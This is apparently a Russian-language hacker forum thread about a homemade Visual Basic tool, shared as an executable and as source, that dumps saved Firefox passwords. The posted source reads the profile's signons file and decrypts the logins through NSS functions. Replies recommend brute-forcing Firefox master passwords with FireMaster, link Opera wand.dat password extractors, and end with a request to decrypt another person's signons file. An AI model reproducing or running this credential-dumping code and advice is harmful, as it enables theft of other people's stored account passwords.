Вобщем накодил на vb небольшую софтинку,прога "вспоминает" пароли от мозиллы,высвечивает урл,логин,пасс,дату,дизайн ака "Tроя жива":( критика уместна,если норм,то доработаю,переделаю,дополн ю,жду отзывов

вот собственно линк на нее:

http://rapidshare.com/files/174956221/ff_p4s_fuck3rz.exe.html

http://dump.ru/file/1338529

http://www.x2b.ru/get/17928


Чуть не забыл,tnx 2 Exlibris & xcedz & Jes(джесу за то что он такой душка) за помощь в придумывании мегохакерского названия для программы!)


#забыл сказать,
перед запуском сохраните ваши пароли
(на всякий случай),ато некоторые уже тестировали xDD

Отлично, работает. Пасы только я не храню в фф ^^

Чуть не забыл,гратц Екслибрис и икскеду за помощь в придумывании мегохакерского названия для программы!)

Gratz, gz — (англ. Congratulations) Поздравляю! (Поздравление с чем-либо)

-----
По сабжу. Добавляй по комбинации клавиш "сохранить в" все также в таком же стиле чтобы красиво было :)

А где мозила хранит пароли?

sFFPath = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & "profiles.ini"

sRet = Space(260)
Call GetPrivateProfileString("Profile0", "Path", vbNullString, sRet, 260, sFFPath)
sRet = Left$(sRet, lstrlen(sRet))

sFFPath = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & sRet & "\signons3.txt"

Open sFFPath For Binary Access Read As #1
sPass = Space(LOF(1))
Get #1, , sPass
Close #1

sRet = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & sRet

svEntry = Split(sPass, "." & vbCrLf)

bvRet = StrConv(sRet, vbFromUnicode)

If CallFunc("NSS_Init", StrPtr(bvRet)) = 0 Then
lKeySlot = CallFunc("PK11_GetInternalKeySlot")
If Not lKeySlot = 0 Then
If CallFunc("PK11_Authenticate", lKeySlot, True, 0) = 0 Then
For i = 1 To UBound(svEntry) - 1
svLines = Split(svEntry(i), vbCrLf)
Enumerate = Enumerate & " " & "URL: " & svLines(0) & vbCrLf
For j = 1 To UBound(svLines) - 3 Step 2
If Not svLines(j + 1) = "---" Then
Enumerate = Enumerate & " " & "Section: " & svLines(j) & vbCrLf
Enumerate = Enumerate & " " & "Value: " & svLines(j + 1) & vbCrLf

bvRet = StrConv(svLines(j + 1), vbFromUnicode)
Call CallFunc("NSSBase64_DecodeBuffer", 0, VarPtr(tSec), StrPtr(bvRet), Len(svLines(j + 1)))

If CallFunc("PK11SDR_Decrypt", VarPtr(tSec), VarPtr(tSecDec), 0) = 0 Then
If tSecDec.SECItemLen > 0 Then
ReDim bvRet(tSecDec.SECItemLen - 1)
CopyMemory bvRet(0), ByVal tSecDec.SECItemData, tSecDec.SECItemLen
Enumerate = Enumerate & " " & "Data: " & StrConv(bvRet, vbUnicode) & vbCrLf
End If
End If
End If

Мммм мозилла что действительно шифруют пароли в base64 ?

_nic
нет,там другое что-то

эмм, а если мастер пароль стоит - всё равно пароли вытащит?

а давайте ценить свое и других время?

вопрос написали русским языком "А где мозила хранит пароли?", ты кинул сурс, но ведь можно было ответить нормально?

я не шарю в vb, но очевидно, что в profiles.ini ты берешь название папки с профилем и в той папке открываешь файл signons3.txt (криво открываешь - у меня создался пустой файл, т.к. фф2 и есть только signons2.txt). почему signons3.txt, а не signons2.txt ? мозилла 3 ? ;) так вот, погуглил бы вначале, а потом бы и изобретал велосипед. хешированные записи паролей хранятся в файлах signons*.txt, скорей всего для 3 мозиллы цифра 3, для 2 - 2, для 1 - просто signons.txt.

дальше пару цитат из перевода статьи Mikhael Felker`а "Механизмы управления паролями в IE и Firefox":

Структура хранилища: Текстовый файл (signons.txt)
Формат данных: ASCII, используя Base64 кодирование (кроме URL и полей)
URL (обычный текст, например www.gmail.com)
Field name (обычный текст, например username, email, userid и т.д..)
Зашифрованное и Base64 кодированное значение вышеописанной информации
Field name (например, password, pass,и т.д..)
Зашифрованное и Base64 кодированное значение вышеописанной информации
...и т.д.... (Может быть много данных для одного URL)
.
(Каждая запись заканчивается точкой)
Шифрование: TripleDES (CBC mode)
Доступ: Network Security Services (NSS) API
Требования к доступу: Авторизованный пользователь и Master Password (если установлен)
Дополнительные файлы: Сертификаты сохранены как certN.db, база данных частных ключей как keyN.db и Security Modules сохранены как secmod.db.

Firefox использует Network Security Services API для проведения криптографических операций. Поскольку это относится к менеджеру паролей, Firefox использует Public Key Cryptography Standard (PKCS) #11, который определяет API для аппаратных и программных модулей сторонних производителей. Также используется PKCS#5 для шифрования паролей. У Firefox также есть опция для использования альтернативного модуля для хранения паролей, совместимого со стандартом Federal Information Processing Standard (FIPS) 140-1. Master Password используется совместно с salt (находится в файле keyN.db) для получения Master Key. Затем Master Key используется для дешифрования имен пользователей, паролей, сохраненных в менеджере паролей.

NSS API имеет несколько функций, которые позволяют Firefox или подобным приложениям получить доступ к базе данных паролей. Установка пароля обрабатывается (PK11_SetPasswordFunc), декодируя Base64 данные (NSSBase64_DecodeBuffer) и дешифруя (PK11SDR_Decrypt), что позволяет соответствующим приложениям получить доступ к именам пользователей и соответствующим паролям. Безопасность всей системы зависит от криптографической стойкости Master Password (созданного пользователем) и доступности файла key3.db (который содержит salt), хранимого в пользовательском профиле.

у меня установлен Master Password и твоя тузла конечно же не сработала (подогнал свой signons2.txt под работоспособность твоего велосипеда).

Master Password надо брутить, брутится очень быстро. инструмент написан давно и доступен с исходниками - Firemaster.

Firemaster is the Firefox master password recovery tool. Firefox uses master password to protect the stored sign-on information for various websites. If the master password is forgotten, then there is no way to recover the master password and user has to lose all the sign-on information stored in it. To prevent this problem, I have developed FireMaster which uses combination of techniques such as dictionary, hybrid and brute force to recover the master password from the Firefox key database file.

ссылки по теме:

http://securityxploded.com/firemaster.php
http://securityxploded.com/firepassword.php
http://www.mozilla-russia.org/products/firefox/faq/
Механизмы управления паролями в IE и Firefox. Часть первая. (http://www.securitylab.ru/analytics/293884.php)
Механизмы управления паролями в IE и Firefox. Часть вторая. (http://www.securitylab.ru/analytics/294067.php)
http://www.mozilla.org/projects/security/pki/nss/

странно,а почему у меня вытаскивались?фф 3,дал сорс,можно было номрально спросить,неадекват блин,тебя кто-то заставлял пользоватся моим велосипедом?пздц виноватым меня делаешь,кто виноват что у тебя фф3 и тебе пришлось править сигнаторс,ахуеть
1. в чем моя неадекватность?
2. я номрально спросил в репе и спросил человек в теме, а ты понтанулся сурсом.
3. никто меня не заставлял, что нельзя проверить работоспособность?
4. я тебя виноватым не делаю, я высказал свое мнение о твоей тулзе.
5. ну тогда уже допиши - онли фф3.
6. успокойся.

сорь за офтоп.
Ну а как из оперовского wand.dat пароли тянуть?нужен только этот файл или ещё какие то?

сорь за офтоп.
Ну а как из оперовского wand.dat пароли тянуть?нужен только этот файл или ещё какие то?
http://speedman.sk/17operawanddatenglish/
http://speedman.sk/downloads/opera.wand.dat.passwords.retrieve.utility.zip

распаковываешь , копируешь wand.dat в папку и запускаешь retrieve.bat :) усе вытягивает то что тебе нужно и сохраняет в файлик ;)

авторы, исходник
http://www.reteam.org/blog/archives/00000012.htm
http://www.reteam.org/blog/archives/unwand.cpp

прога нормальная но работает только на своем копе а есть типа такой же тоьлко которой не свой signons2.txt а чужой расшифровывается?